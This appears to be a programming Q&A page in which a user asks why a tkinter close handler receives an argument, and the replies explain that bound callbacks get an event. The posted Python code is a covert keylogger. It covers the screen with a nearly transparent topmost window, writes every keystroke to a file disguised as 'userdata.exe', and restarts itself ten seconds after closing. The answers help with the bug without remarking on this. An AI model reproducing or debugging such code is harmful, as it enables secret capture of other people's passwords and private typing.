# Why is my function receiving an argument?

Tags: python, tkinter, key-bindings

I have this program i've been writing but for some  reason the `on_closing` function is receiving an argument

Code:

```
from tkinter import *
from time import sleep

def run():
    global root, target
    target = open("userdata.exe", 'a')
    root = Tk()
    root.attributes("-fullscreen", True)
    root.attributes('-alpha', 0.01)
    root.attributes('-topmost', True)

    def key(event):
        target.write(repr(event.char)+" :")

    frame = Frame(root, width=root.winfo_screenwidth(), height=root.winfo_screenwidth())
    frame.bind("<Key>", key)
    frame.bind("<1>", on_closing)
    frame.pack()
    root.protocol("WM_DELETE_WINDOW", on_closing)
    root.mainloop()

def on_closing():
    root.destroy()
    sleep(10)
    target.close()
    run()


run()
```

Any ideas to why this occurs?

Comment: That's because tkinter passes an event argument to its bound callbacks.

Comment: See [Events and Binding](http://effbot.org/tkinterbook/tkinter-events-and-bindings.htm)

Answer (score 5, accepted):

When passing a callback to some piece of software such as `tkinter`, you have to follow that system's rules for what the callback signature should be. When `tkinter` calls a bound method, it passes an `event` argument with it. See [Events and Bindings](http://effbot.org/tkinterbook/tkinter-events-and-bindings.htm)